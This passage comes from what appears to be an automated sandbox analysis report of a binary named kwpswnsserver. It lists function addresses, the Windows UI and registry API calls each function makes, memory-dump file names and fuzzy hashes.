                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Window$LongParent$ClientRectRedraw
                                                                  • String ID:
                                                                  • API String ID: 556606033-0
                                                                  • Opcode ID: b00bdd5007924286e57e771be3f6d7951823966b77a562325c9514ddaf9b7976
                                                                  • Instruction ID: 15f56ef1943773550cc9b75a53fe87fdf92de5f6fbbf8eb1bd29049413410528
                                                                  • Opcode Fuzzy Hash: b00bdd5007924286e57e771be3f6d7951823966b77a562325c9514ddaf9b7976
                                                                  • Instruction Fuzzy Hash: 77213131702215BFEF366A75CD886AE76B9FF05398F100635E812D2991DF64DC118790
                                                                  Function 6C88232D Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6C89BA82: GetWindowLongW.USER32(F04D8BF4,000000F0), ref: 6C89BA8F
                                                                    • Part of subcall function 6C8820A1: GetParent.USER32(?), ref: 6C8820A4
                                                                    • Part of subcall function 6C8820A1: GetParent.USER32(00000000), ref: 6C8820AB
                                                                  • SendMessageW.USER32(?,00000234,00000000,00000000), ref: 6C8823A1
                                                                  • SendMessageW.USER32(?,00000229,00000000,00000000), ref: 6C8823CA
                                                                  • SendMessageW.USER32(?,00000229,00000000,00000000), ref: 6C8823E9
                                                                  • SendMessageW.USER32(?,00000222,?,00000000), ref: 6C882403
                                                                  • SendMessageW.USER32(?,00000222,00000000,?), ref: 6C88242C
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Parent$LongWindow
                                                                  • String ID:
                                                                  • API String ID: 4191550487-0
                                                                  • Opcode ID: 061a2dd2d33e8c94d7b0863ca24fce8e0ba41bea4234a5bdc8450dfd07d35c8c
                                                                  • Instruction ID: aa3f1cb0980cefd1be2ef68e27260073ba0724941fa035a40744721273d69a56
                                                                  • Opcode Fuzzy Hash: 061a2dd2d33e8c94d7b0863ca24fce8e0ba41bea4234a5bdc8450dfd07d35c8c
                                                                  • Instruction Fuzzy Hash: A8212871201605BFDB359B65CD5CFAEB6B9FB0838CF040E25F15286D90CB78AD108660
                                                                  Function 6C8BCD19 Relevance: 7.6, APIs: 5, Instructions: 86windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCursorPos.USER32(?), ref: 6C8BCD62
                                                                  • GetClientRect.USER32(?,?), ref: 6C8BCD8E
                                                                  • PtInRect.USER32(?,?,?), ref: 6C8BCDA6
                                                                  • MapWindowPoints.USER32(?,?,?,00000001), ref: 6C8BCDCF
                                                                  • SendMessageW.USER32(?,00000200,?,?), ref: 6C8BCDEE
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$ClientCursorMessagePointsSendWindow
                                                                  • String ID:
                                                                  • API String ID: 1257894355-0
                                                                  • Opcode ID: 9e032a57b70137b7d7310aeeccab197fbebb088718fd23a354df30d35030764f
                                                                  • Instruction ID: 049b36c227fcc886e36b7495705ff1b2bcaf18d8608bd5cc7bead0fc890a243f
                                                                  • Opcode Fuzzy Hash: 9e032a57b70137b7d7310aeeccab197fbebb088718fd23a354df30d35030764f
                                                                  • Instruction Fuzzy Hash: E231C775A0031AEFCF249F68CD549BEBF75FF05354F10862AF825A2650D730A911CB90
                                                                  Function 6C8BE630 Relevance: 7.6, APIs: 5, Instructions: 86COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 6C8BE67C
                                                                    • Part of subcall function 6C89BAAC: GetWindowLongW.USER32(?,000000EC), ref: 6C89BAB9
                                                                  • OffsetRect.USER32(?,?,00000000), ref: 6C8BE6D8
                                                                  • UnionRect.USER32(?,?,?), ref: 6C8BE6F1
                                                                  • EqualRect.USER32(?,?), ref: 6C8BE6FF
                                                                  • UpdateWindow.USER32(?), ref: 6C8BE736
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Window$EqualLongOffsetUnionUpdate
                                                                  • String ID:
                                                                  • API String ID: 4261707372-0
                                                                  • Opcode ID: 25df1272ba218c58e918d270db4bd5449d8f9c752261f66860ed25c94371889a
                                                                  • Instruction ID: d7316095decfbb091191fea3cfc405effcd0e75da85461a3cdc38bdbb72a3d0b
                                                                  • Opcode Fuzzy Hash: 25df1272ba218c58e918d270db4bd5449d8f9c752261f66860ed25c94371889a
                                                                  • Instruction Fuzzy Hash: EA317071A0160AAFCB14DF68CE44ADEF7B9BF5A308F108766E415E3250DB30A951CB90
                                                                  Function 6C8B8CCC Relevance: 7.6, APIs: 5, Instructions: 81windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6C8B670C: __EH_prolog3_GS.LIBCMT ref: 6C8B6713
                                                                    • Part of subcall function 6C8B670C: GetWindowRect.USER32(00000000,00000000), ref: 6C8B675C
                                                                    • Part of subcall function 6C8B670C: CreateRoundRectRgn.GDI32(00000000,00000000,00000001,?,00000004,00000004), ref: 6C8B6786
                                                                    • Part of subcall function 6C8B670C: SetWindowRgn.USER32(00000000,?,00000000), ref: 6C8B679C
                                                                  • GetSystemMenu.USER32(?,00000000), ref: 6C8B8D56
                                                                  • DeleteMenu.USER32(?,0000F120,00000000,00000000), ref: 6C8B8D73
                                                                  • DeleteMenu.USER32(?,0000F020,00000000), ref: 6C8B8D82
                                                                  • DeleteMenu.USER32(?,0000F030,00000000), ref: 6C8B8D91
                                                                  • EnableMenuItem.USER32(?,0000F060,00000001), ref: 6C8B8DB9
                                                                    • Part of subcall function 6C8B74F0: SetRectEmpty.USER32(?), ref: 6C8B751B
                                                                    • Part of subcall function 6C8B74F0: ReleaseCapture.USER32 ref: 6C8B7521
                                                                    • Part of subcall function 6C8B74F0: SetCapture.USER32(?,?,?,?,6C8AF492,?), ref: 6C8B7534
                                                                    • Part of subcall function 6C8B74F0: RedrawWindow.USER32(?,00000000,00000000,00000505), ref: 6C8B7634
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$DeleteRectWindow$Capture$CreateEmptyEnableH_prolog3_ItemRedrawReleaseRoundSystem
                                                                  • String ID:
                                                                  • API String ID: 4022425685-0
                                                                  • Opcode ID: 383a4bfe0c4b22afaf8dc645d6a13bcfe0731e232a452e65c91e447c47d0bc67
                                                                  • Instruction ID: cc7e41cc73bcdd94b558b05d361f81f20def9f45506bd31c1b130ec27cd72c39
                                                                  • Opcode Fuzzy Hash: 383a4bfe0c4b22afaf8dc645d6a13bcfe0731e232a452e65c91e447c47d0bc67
                                                                  • Instruction Fuzzy Hash: A421A131301317AFDF252B658D98EAE7F3AFF55249B088136F909A7750CB319811DAA0
                                                                  Function 6C888E56 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsWindow.USER32(00000000), ref: 6C888EA5
                                                                  • SendMessageW.USER32(?,00000455,00000000,00000000), ref: 6C888EB9
                                                                  • SendMessageW.USER32(?,00000454,00000000,00000000), ref: 6C888ECC
                                                                  • SetWindowLongW.USER32(?,000000F0,?), ref: 6C888F03
                                                                  • SendMessageW.USER32(?,00000454,00000000,00000000), ref: 6C888F18
                                                                    • Part of subcall function 6C89BA82: GetWindowLongW.USER32(F04D8BF4,000000F0), ref: 6C89BA8F
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSendWindow$Long
                                                                  • String ID:
                                                                  • API String ID: 3430364388-0
                                                                  • Opcode ID: f93010f320c55f7de6f6fd9c9b60cd9020aafa07b3d28c5485fb909a41d6b9a5
                                                                  • Instruction ID: cf849118c4c1a858821feef4634768e0395a45ab4ad81d6263378faeed60405e
                                                                  • Opcode Fuzzy Hash: f93010f320c55f7de6f6fd9c9b60cd9020aafa07b3d28c5485fb909a41d6b9a5
                                                                  • Instruction Fuzzy Hash: 3F21F271202715AFDB259F68CD84E6BBAB9FB84758F10863EB10997E90DB709C04CB60
                                                                  Function 6C88626E Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6C8A3360: EnterCriticalSection.KERNEL32(6CA583D0,?,?,0000007C,?,6C88F718,00000001), ref: 6C8A3391
                                                                    • Part of subcall function 6C8A3360: InitializeCriticalSection.KERNEL32(00000000,?,6C88F718,00000001), ref: 6C8A33A7
                                                                    • Part of subcall function 6C8A3360: LeaveCriticalSection.KERNEL32(6CA583D0,?,6C88F718,00000001), ref: 6C8A33B5
                                                                    • Part of subcall function 6C8A3360: EnterCriticalSection.KERNEL32(00000000,?,0000007C,?,6C88F718,00000001), ref: 6C8A33C2
                                                                  • SetCursor.USER32(00000009), ref: 6C8862B8
                                                                  • LoadCursorW.USER32(?,00007905), ref: 6C8862FD
                                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 6C886313
                                                                  • SetCursor.USER32(?,?,00000009), ref: 6C88632C
                                                                  • DestroyCursor.USER32(00000000), ref: 6C886337
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Cursor$CriticalSection$EnterLoad$DestroyInitializeLeave
                                                                  • String ID:
                                                                  • API String ID: 900973665-0
                                                                  • Opcode ID: 537487f2839e10d8d59cdc17930cc746d49b16b8d76ecefafa9c9d21d8b07260
                                                                  • Instruction ID: dd1bc6119a0daeca5b33d3252d3af4160d4809520eb6d10f4e919d59054e60a7
                                                                  • Opcode Fuzzy Hash: 537487f2839e10d8d59cdc17930cc746d49b16b8d76ecefafa9c9d21d8b07260
                                                                  • Instruction Fuzzy Hash: 8811D231F2A3169BDB705BA8DA84B8E3774E743318F608D7AE508C7F50DB28D8468751
                                                                  Function 6C8CE0BA Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FillRect.USER32(?,?,00000000), ref: 6C8CE0F7
                                                                  • GetParent.USER32(?), ref: 6C8CE109
                                                                  • GetClientRect.USER32(?,?), ref: 6C8CE11C
                                                                  • GetParent.USER32(?), ref: 6C8CE125
                                                                  • MapWindowPoints.USER32(?,?,?,00000002), ref: 6C8CE13D
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ParentRect$ClientFillPointsWindow
                                                                  • String ID:
                                                                  • API String ID: 3058756167-0
                                                                  • Opcode ID: 754657aef219d0bfd361788a3435f5a27f5559a29aff78f096d877bcb1d4ec30
                                                                  • Instruction ID: a19c2cae7cb91a7731f862ab30b85a2fc6c7535eba10332874a9d6edd07dc90e
                                                                  • Opcode Fuzzy Hash: 754657aef219d0bfd361788a3435f5a27f5559a29aff78f096d877bcb1d4ec30
                                                                  • Instruction Fuzzy Hash: A021A432A00219EFCB04EFA4CD498AEBB79FF0A304B518165F505A7651DB31A915CBD1
                                                                  Function 6C93BC0C Relevance: 7.6, APIs: 5, Instructions: 67windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C93BC13
                                                                  • SendMessageW.USER32(00000000,0000007F,00000000,00000000), ref: 6C93BC36
                                                                  • SendMessageW.USER32(00000000,0000007F,00000001,00000000), ref: 6C93BC4A
                                                                  • GetClassLongW.USER32(00000000,000000DE), ref: 6C93BCA7
                                                                  • GetClassLongW.USER32(00000000,000000F2), ref: 6C93BCB8
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ClassLongMessageSend$H_prolog3
                                                                  • String ID:
                                                                  • API String ID: 350087385-0
                                                                  • Opcode ID: 3aecc85989938fb4bb7245ba8b1429330b11481c64fbb7e3ecaca7860111ec5c
                                                                  • Instruction ID: 016e6f7748d21b7b75cd9accfa2b7c7b789bfd6612011c0c0667d1f4d7575a72
                                                                  • Opcode Fuzzy Hash: 3aecc85989938fb4bb7245ba8b1429330b11481c64fbb7e3ecaca7860111ec5c
                                                                  • Instruction Fuzzy Hash: 1911A275A14A3A6BDB325B28CD40BAE7635BF507A8F110720F81977BE0DF61DC1586D0
                                                                  Function 6C888C91 Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsWindow.USER32(00000000), ref: 6C888CE0
                                                                  • SendMessageW.USER32(?,00000455,00000000,00000000), ref: 6C888CF4
                                                                  • SendMessageW.USER32(?,00000454,00000000,00000000), ref: 6C888D07
                                                                  • SetWindowLongW.USER32(?,000000F0,?), ref: 6C888D26
                                                                  • SendMessageW.USER32(?,00000454,00000000,00000000), ref: 6C888D3C
                                                                    • Part of subcall function 6C89BA82: GetWindowLongW.USER32(F04D8BF4,000000F0), ref: 6C89BA8F
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSendWindow$Long
                                                                  • String ID:
                                                                  • API String ID: 3430364388-0
                                                                  • Opcode ID: ed3bf11aed56e20114e02c915d0a941f5fe87a151c64b86ad1aaf7a2c94b00ed
                                                                  • Instruction ID: b9d2b31a52e5665e4d9a9ab8c65ceb927fc2f41538a9d5ed7819c37ca98ea2a8
                                                                  • Opcode Fuzzy Hash: ed3bf11aed56e20114e02c915d0a941f5fe87a151c64b86ad1aaf7a2c94b00ed
                                                                  • Instruction Fuzzy Hash: BC11D671302710BBDB356B69CD08F5BBAB9FFC1B49F208A2AB11596AD0DB709800C760
                                                                  Function 6C89A923 Relevance: 7.6, APIs: 5, Instructions: 66registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegDeleteKeyW.ADVAPI32(00000000,?), ref: 6C89A947
                                                                  • RegDeleteValueW.ADVAPI32(00000000,?,?,00000000), ref: 6C89A967
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 6C89A998
                                                                    • Part of subcall function 6C89ACED: RegCloseKey.ADVAPI32(00000000,?,00000000), ref: 6C89AD92
                                                                    • Part of subcall function 6C89ACED: RegCloseKey.ADVAPI32(00000000,?,00000000), ref: 6C89ADA1
                                                                  • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000001,?,00000000,?,00000000), ref: 6C89A98F
                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 6C89A9B3
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Close$DeleteValue$PrivateProfileStringWrite
                                                                  • String ID:
                                                                  • API String ID: 222425065-0
                                                                  • Opcode ID: 7bf117964404c14552727bd9c70bdcbe80436208388ae09ae7a93797d026225b
                                                                  • Instruction ID: 51c6b75aba13a30b04714128dd691d95ebdced657eb62e15ea6ddcefc77791a8
                                                                  • Opcode Fuzzy Hash: 7bf117964404c14552727bd9c70bdcbe80436208388ae09ae7a93797d026225b
                                                                  • Instruction Fuzzy Hash: 0D115437901626BFCB321F6D8D049DF3A69FF867A8B168924F9259A510DB31D412C6A0
                                                                  Function 6C8B670C Relevance: 7.6, APIs: 5, Instructions: 59COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C8B6713
                                                                  • GetWindowRect.USER32(00000000,00000000), ref: 6C8B675C
                                                                  • CreateRoundRectRgn.GDI32(00000000,00000000,00000001,?,00000004,00000004), ref: 6C8B6786
                                                                  • SetWindowRgn.USER32(00000000,?,00000000), ref: 6C8B679C
                                                                  • SetWindowRgn.USER32(00000000,00000000,00000000), ref: 6C8B67B4
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Rect$CreateH_prolog3_Round
                                                                  • String ID:
                                                                  • API String ID: 2502471913-0
                                                                  • Opcode ID: b98d799dcdd8cc6bfb8480ff1bc4ce4246f7064b880a401b707dc6c5f9de4cee
                                                                  • Instruction ID: b2c3644f60ae0b26827fb596c4891dcf9dd44b7b11f4f39a99c139c777a9e592
                                                                  • Opcode Fuzzy Hash: b98d799dcdd8cc6bfb8480ff1bc4ce4246f7064b880a401b707dc6c5f9de4cee
                                                                  • Instruction Fuzzy Hash: A6116DB5A0061ADFDF19EFA8CD94AEDBB79FF09348F140229E505B2A50DB309C41CB64
                                                                  Function 6C8D07F4 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DrawThemeBackground.UXTHEME(00000000,?,00000001,00000000,?,00000000), ref: 6C8D0828
                                                                  • GetThemeColor.UXTHEME(00000000,00000001,00000000,00000EDB,?), ref: 6C8D083B
                                                                  • GetThemeColor.UXTHEME(00000000,00000001,00000000,00000EDF,?), ref: 6C8D0850
                                                                  • GetSysColorBrush.USER32(00000018), ref: 6C8D085A
                                                                  • FillRect.USER32(?,?,00000000), ref: 6C8D0871
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ColorTheme$BackgroundBrushDrawFillRect
                                                                  • String ID:
                                                                  • API String ID: 3021913306-0
                                                                  • Opcode ID: 74607421bcf658d3c40ae11bd051381464889ea1f0a87e67c5db91af92cf72fa
